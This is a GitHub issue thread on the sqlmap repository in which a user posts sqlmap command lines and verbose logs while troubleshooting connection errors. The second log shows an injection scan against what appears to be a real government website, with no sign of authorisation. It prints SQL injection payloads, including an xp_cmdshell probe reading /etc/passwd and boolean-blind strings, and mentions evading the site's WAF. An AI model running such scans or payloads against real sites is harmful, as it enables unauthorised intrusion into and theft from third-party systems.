search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.02k stars 5.68k forks source link

unable to connect to the target URL. sqlmap is going to retry the request #5451

Closed y0ur3nz closed 1 year ago

y0ur3nz commented 1 year ago

$ ./sqlmap.py -u https://127.01.01:443/tabel/stat2.php --data="tanggal=04&tahun=2020" -t traffic.txt --random-agent -v 6 --flush-session --level=3 --risk=2

[14:23:07] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [14:23:07] [TRAFFIC OUT] HTTP request [#260]: POST /tabel/stat2.php HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.16) Gecko/20101130 MRA 5.4 (build 02647) Firefox/3.5.16 (.NET CLR 3.5.30729; .NET4.0C) Referer: https://127.01.01/tabel/stat2.php Host: 127.01.01 Accept: / Accept-Encoding: gzip,deflate Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-length: 57 Connection: close

stamparm commented 1 year ago

sqlmap is able to recognize 127.01.01 properly as localhost. just tested. you have a problem in your HTTPS server at localhost

y0ur3nz commented 1 year ago

./sqlmap.py -u https://corona.jambiprov.go.id/v2/berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas* -t traffic.txt --random-agent -v 3 --flush-session --level=3 --risk=2

   __H__

[(]__ _ {1.7.6.3#dev} | -| . ['] | .'| . | || ["]|||_,| | ||V... || https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:52:32 /2023-07-04/

[20:52:32] [DEBUG] cleaning up configuration parameters [20:52:33] [INFO] setting file for logging HTTP traffic [20:52:33] [DEBUG] setting the HTTP timeout [20:52:33] [DEBUG] setting the HTTP User-Agent header [20:52:33] [DEBUG] loading random HTTP User-Agent header(s) from file '/data/data/com.termux/files/home/sqlmap-dev/data/txt/user-agents.txt' [20:52:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11' from file '/data/data/com.termux/files/home/sqlmap-dev/data/txt/user-agents.txt' [20:52:33] [DEBUG] creating HTTP requests opener object [20:52:36] [DEBUG] setting the HTTP Referer header to the target URL custom injection marker ('*') found in option '-u'. Do you want to procy [20:53:15] [INFO] flushing session file [20:53:15] [DEBUG] resolving hostname 'corona.jambiprov.go.id' [20:53:15] [INFO] testing connection to the target URL [20:53:16] [DEBUG] declared web page charset 'utf-8' [20:53:17] [INFO] checking if the target is protected by some kind of WAF/IPS [20:53:17] [PAYLOAD] 5773 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/*/; EXEC xp_cmdshell('cat ../../../etc/passwd')# [20:53:17] [DEBUG] got HTTP error code: 403 ('Forbidden') [20:53:17] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS are you sure that you want to continue with further target testing? [Y/y [20:53:22] [WARNING] please consider usage of tamper scripts (option '--tamper') [20:53:22] [INFO] testing if the target URL content is stable [20:53:23] [INFO] target URL content is stable other non-custom parameters found. Do you want to process them too? [Y/ [20:53:25] [INFO] testing if URI parameter '#1' is dynamic [20:53:25] [PAYLOAD] 5813 [20:53:28] [DEBUG] page not found (404) [20:53:29] [WARNING] URI parameter '#1' does not appear to be dynamic [20:53:29] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas(",)')(,.( [20:53:30] [INFO] heuristic (basic) test shows that URI parameter '#1' might be injectable (possible DBMS: 'MySQL') [20:53:30] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas'EiCPGq<'">CsHnox [20:53:31] [INFO] testing for SQL injection on URI parameter '#1*' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' ey [20:53:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 1179=6981-- tfcc [20:53:37] [DEBUG] got HTTP error code: 403 ('Forbidden')

[20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 5682=5682-- WxfQ [20:53:37] [DEBUG] got HTTP error code: 403 ('Forbidden') [20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas' AND 1015=4800-- GRmf [20:53:37] [DEBUG] got HTTP error code: 403 ('Forbidden') [20:53:37] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas' AND 5682=5682-- vpfV [20:53:38] [DEBUG] got HTTP error code: 403 ('Forbidden') [20:53:38] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 8607=4778 AND (2826=2826 [20:53:38] [DEBUG] got HTTP error code: 403 ('Forbidden') [20:53:38] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas) AND 5682=5682 AND (2533=2533 [20:53:38] [DEBUG] got HTTP error code: 403 ('Forbidden') [20:53:38] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas)) AND 1081=6711 AND ((5767=5767 [20:53:38] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [20:53:39] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [20:53:39] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [20:53:40] [CRITICAL] unable to connect to the target URL [20:53:40] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas)) AND 5682=5682 AND ((6215=6215 [20:53:40] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [20:53:40] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [20:53:40] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [20:53:41] [CRITICAL] unable to connect to the target URL [20:53:41] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas))) AND 5186=9805 AND (((9225=9225 [20:53:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [20:53:41] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [20:53:42] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request [20:53:42] [CRITICAL] unable to connect to the target URL [20:53:42] [PAYLOAD] berita-gubernur-al-haris-segera-distribusikan--oksigen-dan-ventilator-bantuan-skk-migas))) AND 5682=5682 AND (((1497=1497 [20:53:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [20:53:43] [DEBUG] unable to connect to the target URL. sqlmap is going to retry the request there seems to be a continuous problem with connection to the target. A [20:53:43] [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 7 times, 404 (Not Found) - 1 times [20:53:43] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

[*] ending @ 20:53:43 /2023-07-04/